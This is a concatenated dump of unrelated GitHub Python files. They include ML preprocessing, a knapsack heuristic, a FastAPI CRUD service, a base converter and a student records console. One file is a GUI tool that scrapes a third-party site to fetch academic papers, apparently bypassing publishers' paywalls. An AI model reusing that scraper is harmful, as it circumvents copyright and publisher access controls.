input_batch['total_flow_warped_mpi2_alpha'])[0]\n \n output_batch['local_flow_warped_frame2'] = local_flow_warped_frame2\n output_batch['total_flow_warped_frame2'] = total_flow_warped_frame2\n return output_batch\n\n def load_weights(self, flow_weights_path: Path, inpainting_weights_path: Path):\n checkpoint_state = torch.load(flow_weights_path, map_location=self.device)\n iter_num = checkpoint_state['iteration_num']\n self.load_sub_network_weights(self.feature_extractor, 'feature_extractor', checkpoint_state['model_state_dict'])\n self.load_sub_network_weights(self.local_flow_estimator, 'flow_estimator', checkpoint_state['model_state_dict'])\n print(f'Loaded Model {flow_weights_path} trained for {iter_num} iterations')\n\n checkpoint_state = torch.load(inpainting_weights_path, map_location=self.device)\n iter_num = checkpoint_state['iteration_num']\n self.load_sub_network_weights(self.infilling_flow_predictor, 'flow_predictor', checkpoint_state['model_state_dict'])\n print(f'Loaded 
Model {inpainting_weights_path} trained for {iter_num} iterations')\n return\n\n @staticmethod\n def load_sub_network_weights(network, network_name, weights_dict: OrderedDict):\n selected_weights = OrderedDict()\n for weight_name in weights_dict.keys():\n if weight_name.startswith(network_name):\n new_weight_name = weight_name[len(network_name)+1:]\n selected_weights[new_weight_name] = weights_dict[weight_name]\n network.load_state_dict(selected_weights)\n return\n","repo_name":"NagabhushanSN95/DeCOMPnet","sub_path":"src/frame_predictors/FramePredictor01.py","file_name":"FramePredictor01.py","file_ext":"py","file_size_in_byte":12283,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"23380420730","text":"from typing import List, Optional\r\n\r\n\r\nfrom alphabt.order.order import Order\r\nfrom alphabt.position.manager import PositionManager\r\n\r\nclass OrderManager:\r\n\r\n _order_queue = []\r\n\r\n @classmethod\r\n def add_order(cls, \r\n order: Order, \r\n send_to_queue_when_overweight: bool) -> None:\r\n\r\n\r\n\r\n reorganize_order_list = cls().reorganize_order()\r\n\r\n if reorganize_order_list is not None:\r\n if not send_to_queue_when_overweight:\r\n return None\r\n cls._order_queue.extend(reorganize_order_list)\r\n else:\r\n\r\n cls._order_queue.append(order)\r\n\r\n\r\n def reorganize_order(self) -> Optional[List[Order]]:\r\n \r\n order_in_position = PositionManager._order_in_position\r\n close_order_idx = PositionManager.find_close_order_index()\r\n\r\n if close_order_idx == 0:\r\n return None\r\n\r\n close_order = order_in_position[close_order_idx]\r\n\r\n\r\n if abs(close_order.unit) >= 2:\r\n\r\n ticker = close_order.ticker\r\n close_price = close_order.exit_price\r\n close_date = close_order.exit_date\r\n\r\n # beause of the action of close position, \r\n # the unit must mutiply -1 to origin order unit\r\n reorganize_unit = [-o.unit for o in order_in_position[: close_order_idx]]\r\n reorganize_order = [Order(ticker=ticker,\r\n unit=u,\r\n action='close',\r\n exit_date=close_date,\r\n exit_price = close_price) \r\n for u in reorganize_unit] \r\n return reorganize_order + order_in_position[close_order_idx + 1: ]\r\n return None\r\n \r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ChingHuanChiu/alphabt","sub_path":"alphabt/order/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"7533829787","text":"import os\r\nimport sys\r\nimport random\r\nimport warnings\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom tqdm import tqdm\r\nfrom itertools import chain\r\nfrom skimage.io import imread, imshow, imread_collection, concatenate_images\r\nfrom skimage.transform import resize\r\nfrom skimage.morphology import label\r\n\r\nfrom keras.models import Model, load_model\r\nfrom keras.layers import Input\r\nfrom keras.layers.core import Dropout, Lambda\r\nfrom keras.layers.convolutional import Conv2D, Conv2DTranspose\r\nfrom keras.layers.pooling import MaxPooling2D\r\nfrom keras.layers.merge import concatenate\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nfrom keras import backend as K\r\n\r\nimport tensorflow as tf\r\nos.chdir('D:/Downloads/Madam Amelia/Data Bowl')\r\n# Set some parameters\r\nBATCH_SIZE = 10 # the higher the better\r\nIMG_WIDTH = 128 # for faster computing on kaggle\r\nIMG_HEIGHT = 128 # for faster computing on 
kaggle\r\nIMG_CHANNELS = 3\r\nTRAIN_PATH = 'D:/Downloads/Madam Amelia/Data Bowl/stage1_train/'\r\nTEST_PATH = 'D:/Downloads/Madam Amelia/Data Bowl/stage1_test/'\r\n\r\nwarnings.filterwarnings('ignore', category=UserWarning, module='skimage')\r\nseed = 42\r\n\r\ntrain_ids = next(os.walk(TRAIN_PATH))[1]\r\ntest_ids = next(os.walk(TEST_PATH))[1]\r\nnp.random.seed(10)\r\n\r\n# Get and resize train images and masks\r\nX_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)\r\nY_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool)\r\n\r\nprint('Getting and resizing train images and masks ... ')\r\nsys.stdout.flush()\r\nfor n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):\r\n path = TRAIN_PATH + id_\r\n img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]\r\n img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)\r\n X_train[n] = img\r\n mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool)\r\n for mask_file in next(os.walk(path + '/masks/'))[2]:\r\n mask_ = imread(path + '/masks/' + mask_file)\r\n mask_ = np.expand_dims(resize(mask_, (IMG_HEIGHT, IMG_WIDTH), mode='constant',\r\n preserve_range=True), axis=-1)\r\n mask = np.maximum(mask, mask_)\r\n Y_train[n] = mask\r\n\r\n# Get and resize test images\r\nX_test = np.zeros((len(test_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)\r\nsizes_test = []\r\nprint('Getting and resizing test images ... ')\r\nsys.stdout.flush()\r\nfor n, id_ in tqdm(enumerate(test_ids), total=len(test_ids)):\r\n path = TEST_PATH + id_\r\n img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]\r\n sizes_test.append([img.shape[0], img.shape[1]])\r\n img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)\r\n X_test[n] = img\r\n\r\nprint('Done!')\r\n\r\n\r\nfrom keras.preprocessing import image\r\n\r\n# Creating the training Image and Mask generator\r\nimage_datagen = image.ImageDataGenerator(shear_range=0.5, rotation_range=50, zoom_range=0.2, width_shift_range=0.2, height_shift_range=0.2, fill_mode='reflect')\r\nmask_datagen = image.ImageDataGenerator(shear_range=0.5, rotation_range=50, zoom_range=0.2, width_shift_range=0.2, height_shift_range=0.2, fill_mode='reflect')\r\n\r\n# Keep the same seed for image and mask generators so they fit together\r\n\r\nimage_datagen.fit(X_train[:int(X_train.shape[0]*0.9)], augment=True, seed=seed)\r\nmask_datagen.fit(Y_train[:int(Y_train.shape[0]*0.9)], augment=True, seed=seed)\r\n\r\nx=image_datagen.flow(X_train[:int(X_train.shape[0]*0.9)],batch_size=BATCH_SIZE,shuffle=True, seed=seed)\r\ny=mask_datagen.flow(Y_train[:int(Y_train.shape[0]*0.9)],batch_size=BATCH_SIZE,shuffle=True, seed=seed)\r\n\r\n\r\n\r\n# Creating the validation Image and Mask generator\r\nimage_datagen_val = image.ImageDataGenerator()\r\nmask_datagen_val = image.ImageDataGenerator()\r\n\r\nimage_datagen_val.fit(X_train[int(X_train.shape[0]*0.9):], augment=True, seed=seed)\r\nmask_datagen_val.fit(Y_train[int(Y_train.shape[0]*0.9):], augment=True, seed=seed)\r\n\r\nx_val=image_datagen_val.flow(X_train[int(X_train.shape[0]*0.9):],batch_size=BATCH_SIZE,shuffle=True, seed=seed)\r\ny_val=mask_datagen_val.flow(Y_train[int(Y_train.shape[0]*0.9):],batch_size=BATCH_SIZE,shuffle=True, seed=seed)\r\n\r\n\r\nfrom matplotlib import pyplot as plt\r\n#matplotlib 
inline\r\n\r\nimshow(x.next()[0].astype(np.uint8))\r\nplt.show()\r\nimshow(np.squeeze(y.next()[0].astype(np.uint8)))\r\nplt.show()\r\nimshow(x_val.next()[0].astype(np.uint8))\r\nplt.show()\r\nimshow(np.squeeze(y_val.next()[0].astype(np.uint8)))\r\nplt.show()","repo_name":"BotOreo/Python-Files","sub_path":"Madam Amelia.py","file_name":"Madam Amelia.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19257129544","text":"import sys\nimport time\nimport numpy as np\n\n\ndef glouton(data):\n\n solution = []\n emplacements_disp = data['emplacements']\n capacite = data['capacite']\n\n while capacite > 0:\n\n emplacements_disp = [x for x in emplacements_disp if x[2] <= capacite]\n\n if len(emplacements_disp) == 0:\n return solution\n\n rentabilite = np.zeros(len(emplacements_disp))\n for i in range(len(rentabilite)):\n rentabilite[i] = emplacements_disp[i][1] / emplacements_disp[i][2]\n rentabilite_sum = rentabilite.sum()\n probabilites = rentabilite / rentabilite_sum\n\n idx = np.random.choice(np.arange(0, len(emplacements_disp)), p=probabilites)\n\n capacite -= emplacements_disp[idx][2]\n solution.append(emplacements_disp[idx])\n emplacements_disp.remove(emplacements_disp[idx])\n\n return solution\n\n\ndef run(data):\n\n best_sol = []\n best_sum = 0\n\n for j in range(0, 10):\n\n sol = glouton(data)\n somme = sum([x[1] for x in sol])\n\n if best_sum < somme:\n best_sol = sol\n best_sum = somme\n\n return best_sol, best_sum\n\n\ndef main():\n\n data = {\n 'nbEmplacements': 0,\n 'emplacements': [],\n 'capacite': 0\n }\n\n ex_path = sys.argv[1] # Path de l'exemplaire\n options = sys.argv[2:]\n\n with open(ex_path, \"r\") as fp:\n for i, line in enumerate(fp):\n if i == 0:\n data['nbEmplacements'] = int(line.strip())\n elif i <= data['nbEmplacements']:\n data['emplacements'].append(tuple(map(int, line.strip().split())))\n else:\n data['capacite'] = int(line.strip())\n\n start_time = time.time()\n\n solution, max_revenu = run(data)\n\n execution_time = time.time() - start_time\n\n if '-p' in options: # On imprime la solution\n # print('Solution avec revenu = ' + str(max_revenu))\n for idx, place in enumerate(solution):\n end = ','\n if idx == len(solution) - 1:\n end = '\\n'\n print(place[0], end=end)\n if '-t' in options: # On imprime le temps d'exécution\n print(execution_time)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Observablerxjs/TPs-8775","sub_path":"tp2/src/glouton.py","file_name":"glouton.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27222744271","text":"import pandas as pd\nimport streamlit as st\n\nimport SessionState\n\nsession = SessionState.get(columns=None)\n\nst.info(\n \"## Instructions:\\n\"\n + \"1. Upload simple csv (like `data.csv` from this repo)\\n\"\n + \"2. Check the box to choose column names\\n\"\n + \"3. Deselect one of the column names\\n\"\n + \"4. 
Try to add that column name back, note that it takes two tries\\n\"\n)\n\ncsv_file = st.file_uploader(\"File\", type=\"csv\")\n\nif csv_file is not None:\n dataframe = pd.read_csv(csv_file)\n all_columns = list(dataframe.columns)\n if session.columns is None:\n session.columns = all_columns.copy()\n if st.checkbox(\"Select Columns\", False):\n session.columns = st.multiselect(\n \"Columns\", all_columns, session.columns\n )\n st.write(dataframe.filter(list(session.columns)))\n","repo_name":"benlindsay/streamlit-double-input-error","sub_path":"1_hideable_column_selection_with_sessionstate.py","file_name":"1_hideable_column_selection_with_sessionstate.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12914922008","text":"from PIL import Image, ImageDraw, ImageFont\nfrom HoldemChartCreator.hands import hands\n\nDEFAULT_BORDER = 5\nMIN_CELL_SIZE = 20\nCELL_PADDING_PERCENTAGE = 0.1\n\n\ndef create_chart(width, height, colors, bd=DEFAULT_BORDER, bg='black'):\n img = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n draw = ImageDraw.Draw(img)\n margin_l, cell_w, margin_r = calculate_boundaries(width, bd=bd)\n margin_t, cell_h, margin_b = calculate_boundaries(height, bd=bd)\n font = scale_font(min(cell_h, cell_w) * (1 - 2 * CELL_PADDING_PERCENTAGE))\n draw.rectangle(((margin_l, margin_t), (width - margin_r, height - margin_b)), fill=bg)\n for i, (hands_row, colors_row) in enumerate(zip(hands, colors)):\n for j, (hand, color) in enumerate(zip(hands_row, colors_row)):\n NW = (margin_l + bd + (cell_w + bd) * j, margin_t + bd + (cell_h + bd) * i)\n SE = (margin_l + (cell_w + bd) * (j + 1), margin_t + (cell_h + bd) * (i + 1))\n draw.rectangle((NW, SE), fill=color['bg'])\n if i == j:\n text_offset = NW[0] + int(CELL_PADDING_PERCENTAGE * 2.5 * cell_w), \\\n NW[1] + int(CELL_PADDING_PERCENTAGE * 2.5 * cell_h)\n else:\n text_offset = NW[0] + int(CELL_PADDING_PERCENTAGE * cell_w), \\\n NW[1] + int(CELL_PADDING_PERCENTAGE * 2.5 * cell_h)\n draw.text(text_offset, hand, font=font, fill=color['fg'])\n return img\n\n\ndef calculate_boundaries(size, bd=DEFAULT_BORDER):\n x = int((size - bd) / 13) - bd\n if x < MIN_CELL_SIZE:\n raise ValueError\n l = (size - bd - (x + bd) * 13) // 2\n r = size - (x + bd) * 13 - l - bd\n return l, x, r\n\n\ndef scale_font(size, font=\"consola.ttf\"):\n x = 1\n f = ImageFont.truetype(font, x)\n while f.getsize(\"XXx\")[0] < size:\n x += 1\n f = ImageFont.truetype(font, x)\n return f\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"noplus/HoldemChartCreator","sub_path":"HoldemChartCreator/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21530063874","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def inorderTraversal(self, root: TreeNode) -> List[int]:\n stack = []\n res = []\n while root or stack:\n while root:\n stack.append(root)\n root = root.left\n root = stack.pop()\n res.append(root.val)\n root = root.right\n return res\n\n#Iteratively\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def inorderTraversal(self, root: TreeNode) -> List[int]:\n res = []\n def helper(node):\n if 
node:\n helper(node.left)\n res.append(node.val)\n helper(node.right)\n helper(root)\n return res\n#Recursive","repo_name":"HHonoka/LeetCode-","sub_path":"LeetCode Tree/venv/LeetCode 94 Binary Tree Inorder Traversal.py","file_name":"LeetCode 94 Binary Tree Inorder Traversal.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19503156951","text":"import re\r\nimport logging\r\nimport os\r\nimport zipfile\r\nimport time\r\n\r\n\r\ndef month(m):\r\n li = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\",\r\n \"July\", \"September\", \"October\", \"November\", \"December\"]\r\n return li[m - 1]\r\n\r\n\r\nif not os.path.exists(\"log\"):\r\n os.makedirs(\"log\")\r\nelse:\r\n localtime = time.localtime()\r\n year = localtime.tm_year\r\n mon = month(localtime.tm_mon)\r\n day = localtime.tm_mday\r\n hour = localtime.tm_hour\r\n mini = localtime.tm_min\r\n titleX = \"log\\\\exchange{0}y{1}{2}d{3}h{4}min{5}sec.zip\".format(year, mon, day, hour, mini,\r\n str(localtime.tm_sec + time.time() % 1))\r\n jungle_zip = zipfile.ZipFile(titleX, 'w')\r\n jungle_zip.write('log\\\\exchange_log.log', compress_type=zipfile.ZIP_DEFLATED)\r\n jungle_zip.close()\r\n\r\nlogger = logging.getLogger(\"logger\")\r\nlogger.setLevel(logging.DEBUG)\r\nfmt = logging.Formatter(fmt=\"%(name)s: %(asctime)s - %(levelname)s: %(message)s\")\r\nsh = logging.StreamHandler()\r\nsh.setFormatter(fmt)\r\nsh.setLevel(logging.INFO)\r\nfh = logging.FileHandler(\"log/exchange_log.log\", \"w\", encoding=\"utf-8\")\r\nfh.setLevel(logging.DEBUG)\r\nfh.setFormatter(fmt)\r\nlogger.addHandler(sh)\r\nlogger.addHandler(fh)\r\n\r\n\r\nprint(\"\"\"\r\n0V 01C 002F 0003D版本\r\nb/B/0代表二进制\r\no/O/1代表八进制\r\nd/D/10代表十进制\r\nh/H/16代表十六进制\r\n输入的三个参数用两个空格分开,\r\n第一个是初始数值,不用加任何前缀\r\n第二个是初始类型,用上面的表示,\r\n第三个是您要转换成的类型,用上面的表示\r\n\"\"\")\r\n\r\n\r\ndef f(v=\"\"):\r\n if (v == \"b\") or (v == \"B\"):\r\n return 0\r\n elif (v == \"o\") or (v == \"O\"):\r\n return 1\r\n elif (v == \"d\") or (v == \"D\"):\r\n return 2\r\n elif (v == \"h\") or (v == \"H\"):\r\n return 3\r\n\r\n\r\ndef _f(v=0):\r\n if v == 0:\r\n return 2\r\n elif v == 1:\r\n return 8\r\n elif v == 2:\r\n return 10\r\n elif v == 3:\r\n return 16\r\n\r\n\r\nwhile True:\r\n num = input(\"Please input the number and type, split with two space:\")\r\n num = num.split(\" \") # 转化成两个部分,第一部分是数字,第二部分是格式,第三部分是转换后的格式\r\n logger.debug(f\"You input:{num}\")\r\n if num[0] == '': # 输入不能为空\r\n logger.warning(\"请输入数字\")\r\n continue\r\n\r\n number = num[0]\r\n if bool(re.search(\"[^0-9a-fA-F]\", str(number))):\r\n logger.warning(\"请输入一个整数\")\r\n continue\r\n try:\r\n t = f(num[1])\r\n except IndexError:\r\n tl = [True, True, True, True]\r\n for s in str(number):\r\n if tl[0] and bool(re.match(\"[^0-1]\", s)):\r\n tl[0] = False\r\n if tl[1] and bool(re.match(\"[^0-7]\", s)):\r\n tl[1] = False\r\n if tl[2] and bool(re.match(\"[^0-9]\", s)):\r\n tl[2] = False\r\n if tl[3] and bool(re.match(\"[^0-9a-fA-F]\", s)):\r\n tl[3] = False\r\n if tl[2] and (not tl[0]):\r\n t = 2\r\n else:\r\n t = tl.index(True)\r\n try:\r\n t_to = f(num[2])\r\n except IndexError:\r\n if t != 2:\r\n t_to = 2\r\n else:\r\n t_to = 0\r\n\r\n logger.info(f\"智能判断为{t} -- {t_to}\")\r\n try:\r\n out = int(str(number), _f(t))\r\n except ValueError:\r\n logger.warning(\"指示错误\")\r\n continue\r\n if t_to == 0:\r\n out = bin(out)\r\n elif t_to == 1:\r\n out = oct(out)\r\n elif t_to == 3:\r\n out = hex(out)\r\n 
logger.exception(f\"从{number}转换成{out}\")\r\n","repo_name":"hsszl/exchange_base","sub_path":"main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24232012939","text":"from fastapi import APIRouter\n\nimport response\nfrom config.db import conn\nfrom models.index import blogs\nfrom schemas.index import Blog\nfrom transformer import BlogTransformer\nblog = APIRouter()\n\n@blog.get(\"/\")\nasync def read_data():\n try:\n blog_data = conn.execute(blogs.select()).fetchall()\n # return conn.execute(blogs.select()).fetchall()\n transformer = BlogTransformer.transform(blog_data)\n return response.ok(transformer, \"\")\n except Exception as e:\n return response.badRequest('', f'{e}')\n\n\n@blog.get(\"/{id}\")\nasync def read_data(id : int):\n return conn.execute(blogs.select().where(blogs.c.id == id)).fetchall()\n\n@blog.post(\"/\")\nasync def write_data(blog: Blog):\n conn.execute(blogs.insert().values(\n title = blog.title,\n slug = blog.slug,\n description = blog.description\n ))\n return conn.execute(blogs.select()).fetchall()\n\n@blog.put(\"/{id}\")\nasync def update_data(id:int, blog: Blog):\n conn.execute(blogs.update().values(\n title=blog.title,\n slug=blog.slug,\n description=blog.description\n ).where(blogs.c.id == id))\n return conn.execute(blogs.select()).fetchall()\n\n@blog.delete(\"/{id}\")\nasync def delete_data(id: int):\n conn.execute(blogs.delete().where(blogs.c.id == id))\n return conn.execute(blogs.select()).fetchall()","repo_name":"furqanismail/fastapi-rest-crud","sub_path":"routes/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"908674518","text":"#coding = utf-8\nimport re\nimport requests\nimport webbrowser\nimport tkinter as tk\nimport tkinter.messagebox\n\"\"\"\nauthor : Srpihot\ngithub : https://github.com/Srpihot\nupdate_time : 2020-06-15\nversion : Fuck-Paper-download v1.1\n\"\"\"\ndef get_link(url_get):\n paper_link=url_get.get()\n try:\n if 'wanfangdata.com.cn' in paper_link:\n #遇到万方进行参数处理\n temp_re = re.compile('(^|&)id=([^&]*)',re.S)\n temp = re.findall(temp_re,paper_link)\n paper_link = 'http://d.wanfangdata.com.cn/Periodical/'+temp[0][1]\n\n headers={\n 'Host': 'ifish.fun',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1'\n }\n base_url='https://ifish.fun/paper/search?key='\n url=base_url+paper_link\n html=requests.get(url=url,headers=headers).text\n\n pattern=re.compile('下载地址:(.*?)(.*?)',re.S)\n results=re.findall(pattern,html)\n download_link = results[0][2]\n webbrowser.open(download_link,new=1)\n except:\n tkinter.messagebox.showerror(title='错误', message='请检查网址是否正确!') \n\n\ndef main():\n windows = tk.Tk()\n windows.title('Paper-Download V1.1 By-Srpihot*')\n windows.geometry('500x150')\n windows.iconbitmap(r'./lib/icon.ico')\n icon = tk.PhotoImage(file=r'./lib/icon.png')\n icon_p = tk.Canvas(windows,width=80,height=80)\n icon_p.create_image(40,40,image=icon)\n icon_p.place(x=40,y=7)\n name = tk.Label(windows,text='Paper Download',font=('微软雅黑',30),width=15,height=1)\n 
name.place(x=110,y=9)\n    use_how = tk.Label(windows,text='使用方法:输入具体网址点击下载即食用',font=('微软雅黑',8),width=30,height=1)\n    use_how.place(x=0,y=120)\n    notice = tk.Label(windows,text='仅供学习参考,若所造成的法律责任与本人无关.',font=('微软雅黑',8),fg='red',width=35,height=1)\n    notice.place(x=240,y=120)\n    url_get = tk.Entry(windows, show = None , font=('Arial',14),width=30)\n    url_get.place(x=20,y=90)\n    but=tk.Button(windows,text=\"下载\",command=lambda : get_link(url_get),width=10)\n    but.place(x=390,y=89)\n    windows.mainloop()\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Srpihot/Paper-Download","sub_path":"fuck-paper-download.py","file_name":"fuck-paper-download.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"31"} +{"seq_id":"12580549637","text":"import tkinter as tk\n\nwindow = tk.Tk()\n\nwindow.title(\"Student Management System\")\nnames=[] #학생의 이름\nnumbers=[] #학생의 학번\nphones=[] #학생의 핸드폰 번호\npasswords = [] # 학생의 비밀번호\ncourse=[\"프로그래밍 입문\",\"크리에이티브디자인\",\"AI응용수학\",\"DU실용영어\",\"AI융합비전설계\",\"나의대학생활과진로\",\"컴퓨팅사과와코딩\",\"DU사랑빛자유프로젝트\"] #학생의 수강정보\nselected_course=[]\ngrades = {}\nwhile True: #메인메뉴\n    print(\"\"\"=============\n    1.학생정보 관리기능\n    2.수강정보 관리기능\n    3.성적정보 관리기능\n    4.기타기능\n    5.종료\n    =============\"\"\")\n    user_input=int(input(\"원하는 기능을 선택하세요\"))\n    if user_input==1: #메인메뉴에서 1번이 선택될경우\n        while True:\n            print(\"\"\"=============\n            1.학생 추가\n            2.학생 삭제\n            3.학생 확인\n            4.메인메뉴로 돌아가기\n            =============\"\"\")\n            user_input=int(input(\"원하는 기능을 선택하세요\"))\n            if user_input==1: #학생정보 관리기능에서 1번이 선택될경우(\"학생추가\")\n                name=input(\"학생의 이름을 입력하세요\")\n                number=input(\"학생의 학번을 입력하세요\")\n                phone=input(\"학생의 전화번호를 입력하세요\")\n                password = input(\"학생의 비밀번호를 입력하세요: \")\n                names.append(name)\n                numbers.append(number)\n                phones.append(phone)\n                passwords.append(password)\n                \n            elif user_input==2: #학생정보 관리기능에서 2번이 선택될경우(\"학생삭제\")\n                while True:\n                    if len(names)==0:\n                        print(\"등록된 학생이 없습니다\")\n                        break\n                    for i in range(len(names)):\n                        print(i+1,\".\",\" \",names[i],numbers[i],phones[i],course)\n                    user_input=input(\"삭제할 번호를 입력하세요 (n을 입력하면 뒤로 돌아갑니다): \")\n                    if user_input == 'n':\n                        break\n                    try:\n                        user_input = int(user_input)\n                    except ValueError:\n                        print(\"올바른 번호를 입력하세요.\")\n                        continue\n                    user_input -= 1\n                    if user_input in range(len(names)):\n                        del names[user_input]\n                        del numbers[user_input]\n                        del phones[user_input]\n                        del passwords[user_input]\n                    if user_input==10:\n                        break\n            elif user_input == 3: # 학생정보 관리기능에서 3번이 선택될 경우(\"학생확인\")\n                while True:\n                    search_input = input(\"검색할 학생의 학번을 입력하세요: \")\n                    if search_input in numbers:\n                        password_input = input(\"비밀번호를 입력하세요: \")\n                        for i in range(len(names)):\n                            if search_input in [names[i], numbers[i], passwords[i], course[i]]:\n                                print(f\"이름: {names[i]}, 학번: {numbers[i]}, 전화번호: {phones[i]}, 수강정보: {course[i]}\")\n                                found = True\n                                break \n                    else:\n                        print(\"검색 결과가 없거나 비밀번호가 일치하지 않습니다.\")\n                        break\n                    \n            elif user_input == 4: # 학생정보 관리기능에서 4번이 선택될 경우\n                break\n            \n    elif user_input == 2: # 메인메뉴에서 2번이 선택될 경우\n        while True:\n            print(\"\"\"=================\n            1. 수강과목 등록\n            2. 수강과목 삭제\n            3. 메인메뉴로 돌아가기\n            =========================\"\"\")\n            user_input = int(input(\"원하는 기능을 선택하세요: \"))\n\n            if user_input == 1: # 수강과목 등록\n                while True:\n                    print(\"학생이 수강하고 있는 과목을 선택하세요\")\n                    for i in range(len(course)):\n                        print(\"No. 
\" + str(i + 1) + \", \" + course[i])\n try:\n selected_subject_index = int(input(\"원하는 과목 번호를 선택하세요: \"))\n if selected_subject_index < 1 or selected_subject_index > len(course):\n print(\"잘못된 입력입니다.\")\n else:\n selected_course.append(course[selected_subject_index - 1])\n choice = input(\"과목 선택이 완료되었습니까? (y/n): \")\n if choice.lower() == \"y\":\n print(\"학생의 수강정보 입력이 완료되었습니다.\")\n break\n except ValueError:\n print(\"잘못된 입력입니다.\")\n\n elif user_input == 2: # 수강과목 삭제\n if len(selected_course) == 0:\n print(\"수강 중인 과목이 없습니다.\")\n else:\n print(\"수강 중인 과목:\")\n for i, subject in enumerate(selected_course, 1):\n print(f\"{i}. {subject}\")\n try:\n selected_subject_index = int(input(\"삭제할 과목 번호를 선택하세요: \"))\n if selected_subject_index < 1 or selected_subject_index > len(selected_course):\n print(\"잘못된 입력입니다.\")\n else:\n deleted_subject = selected_course.pop(selected_subject_index - 1)\n print(f\"{deleted_subject} 과목이 삭제되었습니다.\")\n except ValueError:\n print(\"잘못된 입력입니다.\")\n\n elif user_input == 3: # 메인메뉴로 돌아가기\n break\n \n elif user_input == 3: # 메인메뉴에서 3번이 선택될 경우\n while True:\n print(\"\"\"=============\n 1. 성적입력\n 2. 성적수정\n 3. 성적조회\n 4. 성적통계\n 5. 메인메뉴로 돌아가기\n =============\"\"\")\n \n user_input = int(input(\"원하는 기능을 선택하세요: \"))\n \n if user_input == 1:\n def enter_grades():\n numbers = input(\"학생의 학번을 입력하세요: \")\n print(\"수강 가능한 과목:\")\n for i, subject in enumerate(course, 1):\n print(f\"{i}. {subject}\")\n subject_index = int(input(\"성적을 입력할 과목의 번호를 선택하세요: \")) - 1\n selected_subject = course[subject_index]\n grade = input(\"성적을 입력하세요: \")\n \n if numbers in grades:\n grades[numbers][selected_subject] = grade\n else:\n grades[numbers] = {selected_subject: grade}\n\n print(\"성적이 입력되었습니다.\")\n\n enter_grades()\n\n elif user_input == 2:\n def modify_grades():\n numbers = input(\"학생의 학번을 입력하세요: \")\n course = input(\"과목명을 입력하세요: \")\n\n if numbers in grades and course in grades[numbers]:\n new_grade = input(\"수정할 성적을 입력하세요: \")\n grades[numbers][course] = new_grade\n print(\"성적이 수정되었습니다.\")\n else:\n print(\"입력한 학생의 성적 정보가 존재하지 않습니다.\")\n\n modify_grades()\n\n elif user_input == 3:\n def view_grades():\n numbers = input(\"성적을 조회할 학생의 학번을 입력하세요: \")\n\n if numbers in grades:\n for course, grade in grades[numbers].items():\n print(f\"과목: {course}, 성적: {grade}\")\n else:\n print(\"입력한 학번의 학생의 성적 정보가 존재하지 않습니다.\")\n\n view_grades()\n\n elif user_input == 4:\n def calculate_statistics():\n print(\"수강 가능한 과목:\")\n for i, subject in enumerate(course, 1):\n print(f\"{i}. {subject}\")\n subject_index = int(input(\"성적 통계를 조회할 과목의 번호를 선택하세요: \")) - 1\n selected_subject = course[subject_index]\n\n if selected_subject in course:\n grades_for_course = [float(grade) for student_grades in grades.values() if selected_subject in student_grades for grade in student_grades.values() if grade.isdigit()]\n if grades_for_course:\n average = sum(grades_for_course) / len(grades_for_course)\n maximum = max(grades_for_course)\n minimum = min(grades_for_course)\n \n print(f\"{selected_subject} 과목의 성적 통계:\")\n print(f\"평균: 